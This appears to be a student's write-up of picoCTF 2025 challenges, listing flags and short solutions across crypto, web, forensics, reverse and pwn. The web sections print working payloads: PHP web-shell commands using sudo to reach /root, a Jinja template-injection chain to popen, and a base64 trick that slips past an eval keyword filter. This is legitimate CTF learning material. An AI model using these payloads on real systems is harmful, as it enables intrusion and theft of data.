picoCTF 2025
===
[TOC]
# General
## FANTASY CTF
connect to the host by **nc verbal-sleep.picoctf.net 49930** then press many enter and there will have option, I chosed **c**, then many enter again the press **a**, after many enter I get the flag.
```picoCTF{m1113n1um_3d1710n_34904158}```
## Rust fixme 1
```
add ; at line 5 before // How do we end statements in Rust?
delete 17-19 line
in line 25, turn ;? to {}
```
I use **sudo apt install cargo** to install cargo, and then we can run the file by **cargo run**
```picoCTF{4r3_y0u_4_ru$t4c30n_n0w?}```
## Rust fixme 2
---
I get this from chatGPT, it helps
So I change 3,34-35 line to
```
line 3:
fn decrypt(encrypted_buffer:Vec<u8>, borrowed_string: &mut String){
line 34, 35:
let mut party_foul = String::from("Using memory unsafe languages is a: "); // Is this variable changeable?
decrypt(encrypted_buffer,&mut party_foul);
```
Success, and the flag is
```picoCTF{4r3_y0u_h4v1n5_fun_y31?}```
## Rust fixme 3
Method 1:
I change the flag hex_values into **fixme2's code** and **cargo run**, I get the flag
Method 2:
The true way is to change the funcion to safety by adding **unsafe{}** telling the computer we know what are we doing.
```picoCTF{n0w_y0uv3_f1x3d_1h3m_411}```
<!-- ## yara mabay
57 FF FF FF FF 65 6C 63 6F 6D 65 20 74 6F 20 74 68 65 20 59 61 72 61 52 75 6C 65 73 30 78 31 30 30 20 63 68 61
```
rule NumberOne
{
meta:
desc = "Sonala"
weight = 10
strings:
$a = {60 BE 00 C0 40 00 8D BE 00 50 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 A1 00 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 02 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D BE 00 D0 00 00 8B 07 09 C0 74 3C 8B 5F 04 8D 84 30 B0 19 01 00 01 F3 50 83 C7 08 FF 96 F4 1A 01 00 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF 96 FC 1A 01 00 09 C0 74 07 89 03 83 C3 04 EB E1 FF 96 F8 1A 01 00 83 C7 04 8D 5E FC 31 C0 8A 07 47 09 C0 74 22 3C EF 77 11 01 C3 8B 03 86 C4 C1 C0 10 86 C4 01 F0 89 03 EB E2 24 0F C1 E0 10 66 8B 07 83 C7 02 EB E2 8B AE 00 1B 01 00 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 1F 02 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 1A 2C FF FF}
$b= {65 6C 63 6F 6D 65 20 74 6F 20 74 68 65 20 59 61 72 61 52 75 6C 65 73 30 78 31 30 30 20 63 68 61}
condition:
$b or $a or
}
``` -->
# Cryptography
## hashcrack
I use [this online site](https://hashes.com/en/decrypt/hash) to crack the hash
the flag is:
```picoCTF{UseStr0nG_h@shEs_&PaSswDs!_23622a7e}```
## EVEN RSA CAN BE BROKEN???
After netcat, I get the N,e,cipher in RSA, I use [factordb](https://factordb.com/) to break the N, and I get **2×722....89** so I write a exploit to find the d and get the plain text.
```
from Crypto.Util.number import long_to_bytes, inverse
cipher=12354068785372743834088042994953182995108613793127279676567280701268996076363274641674557389708663628457245579188761637326090035613401353560049788015957597
n=14443659076665439907009130165672264832223456182118963115746693258422606965855652734714369291676880114719350425704431061267821322700731676384472736508638778
p=7221829538332719953504565082836132416111728091059481557873346629211303482927826367357184645838440057359675212852215530633910661350365838192236368254319389
q=2
e=65537
phi=p
d=inverse(e, (p-1)*(q-1))
plain=long_to_bytes(pow(cipher, d, n))
print(plain.decode())
```
This is my flag:
```picoCTF{tw0_1$_pr!m381772be5}```
## Guess My Cheese (Part 1)
I search for the cheese, and find several that works.
I found that it is a substitution cipher,so I netcat many times to get a shorter secret cheese
We only have three time to try, so I use the longer cheese to get more alpha.
```
quark
swiss
cheddar
ricotta
Provolone
Jarlsberg
Cheshire
Mascarpone
Manchego
```
The secret cheese is **roncalneo**, and I get the flag
‵```picoCTF{ChEeSy033d0004}```
# Web
## Cookie Monster Secret Recipe
Decode the cookie with base64 and get the flag
```picoCTF{c00k1e_m0nster_l0ves_c00kies_E634DFBB}```
## head-dump
I enter the **http://verbal-sleep.picoctf.net:53866/api-docs** by clicking the **API Documention**
It shows a api, and I use the heap-dump to get a file
The flag is:
```picoCTF{Pat!3nt_15_Th3_K3y_13d135dd}```
## n0s4n1ty 1
I upload my RCE paload
```
http://standard-pizzas.picoctf.net:51903/uploads/exp.php?command=pwd
>/var/www/html/uploads
http://standard-pizzas.picoctf.net:51903/uploads/exp.php?command=sudo -l
>Matching Defaults entries for www-data on challenge: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on challenge: (ALL) NOPASSWD: ALL (ALL) NOPASSWD: ALL
http://standard-pizzas.picoctf.net:51015/uploads/exp.php?command=cd /;sudo chmod 777 root;cd /root;pwd
>/root
http://standard-pizzas.picoctf.net:51015/uploads/exp.php?command=cd /;sudo chmod 777 root;cd /root;ls
>flag.txt
http://standard-pizzas.picoctf.net:51015/uploads/exp.php?command=cd /;sudo chmod 777 root;cd /root;cat f*
>picoCTF{wh47_c4n_u_d0_wPHP_5f3c22c0}
```
## SSTI1
A ssti attack can get the flag
```
{{7*7}}
>49
{{().__class__}}
><class 'tuple'>
{{().__class__.__mro__}}
>(<class 'tuple'>, <class 'object'>)
{{().__class__.__mro__[1].__subclasses__()}}
>a list of subclasses
{{().__class__.__mro__[1].__subclasses__()[132]}}
><class 'os._wrap_close'>
{{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__}}
>a list of global thing
{{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}
>__pycache__ app.py flag requirements.txt
{{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('cat flag').read()}}
>picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_753eca43}
```
the flag is
```picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_753eca43}```
## 3v@l
We can't use **os,ls,cat,/** etc, so I try to read file
```
__import__("builtins").open(/flag.txt)).read()
```
the result is **Error: Detected forbidden keyword ''.**
So I base64 encode /flag.txt and decoded it to bypass '/'
final paload
```
__import__("builtins").open(__import__('base64').b64decode('L2ZsYWcudHh0')).read()
```
```picoCTF{D0nt_Use_Unsecure_f@nctionsa4121ed2}```
# Forensics
## Ph4nt0m 1ntrud3r
open the file with wireshark, then sort it with the time
there have some base64 code at the end, I decode the last one and get '}'
```
cGljb0NURg==
ezF0X3c0cw==
bnRfdGg0dA==
XzM0c3lfdA==
YmhfNHJfZQ==
NWU4Yzc4ZA==
fQ==
```
base64 decode get
```
picoCTF
{1t_w4s
nt_th4t
_34sy_t
bh_4r_e
5e8c78d
}
```
the flag is
```picoCTF{1t_w4snt_th4t_34sy_tbh_4r_e5e8c78d}```
## RED
It is a LSB steganography, we will get a base64 encoded string, decode and get the flag
```picoCTF{r3d_1s_th3_ult1m4t3_cur3_f0r_54dn355_}```
## Event-Viewing
After opening the file with event viewer, I filter the logs with source and find **Misinstaller** that install a strange file called **Totally_Legit_Software** and the manufacturer is base64 cipher of part 1 flag.
```
cGljb0NURntFdjNudF92aTN3djNyXw==
>picoCTF{Ev3nt_vi3wv3r_
```
I try to search for **Totally_Legit_Software** and find this event and the objectValueName is the base64 cipher of part 2 flag.
```
MXNfYV9wcjN0dHlfdXMzZnVsXw==
>1s_a_pr3tty_us3ful_
```
I sort the event id in order, and find User32 that shotdown computer, and the param6 is the base64 cipher of part 3 flag.
```
dDAwbF84MWJhM2ZlOX0=
>t00l_81ba3fe9}
```
The flag is ```picoCTF{Ev3nt_vi3wv3r_1s_a_pr3tty_us3ful_t00l_81ba3fe9}```
# Reverse
## Flag Hunters
I input **;RETURN 0;** at the Crowd: to let the code return to the first line of the string.
```picoCTF{70637h3r_f0r3v3r_710a5048}```
## Quantum Scrambler
I make a list of the table, and match the table with the flag one
```
import sys
def scramble(L):
A = L
i = 2
while (i < len(A)):
A[i-2] += A.pop(i-1)
A[i-1].append(A[:i-2])
i += 1
return L
def main():
flag = get_flag()
flag=[['0x01'], ['0x02'], ['0x03'],['0x04'],['0x05'],['0x06'],['0x07'],['0x08'], ['0x09'], ['0x10'], ['0x11'], ['0x12'], ['0x13'], ['0x14'], ['0x15'], ['0x16'], ['0x17'], ['0x18'], ['0x19'], ['0x20'], ['0x21'], ['0x22'], ['0x23'], ['0x24'], ['0x25'], ['0x26'], ['0x27'], ['0x28'], ['0x29'], ['0x30'], ['0x31'], ['0x32']]
print((flag))
cypher = scramble(flag)
print(cypher)
print(len(cypher))
if __name__ == '__main__':
main()
```
```
70 69 63 6f 43 54 46 7b 70 79 74 68 6f 6e 5f 69 73 5f 77 65 69 72 64 62 35 37 31 34 32 66 66 7d
picoCTF{python_is_weirdb57142ff}
```
# PWN
## PIE TIME 1
main is end with **33d**,so I change it to win function's **2a7**, and get the flag
```picoCTF{b4s1c_p051t10n_1nd3p3nd3nc3_80c3b8b7}```
## PIE TIME 2
I first check the address of main win function
I also find format string problem at place **Enter your name:** I use %p to dump the hex.
I first print the address of win,main, then I use %p to find the address
At 19 %p, I find the address of main+7
I use %p dump the main+7 add and change it to win
```picoCTF{p13_5h0u1dn'7_134k_2509623b}```
Sign in with Wallet
Connect another wallet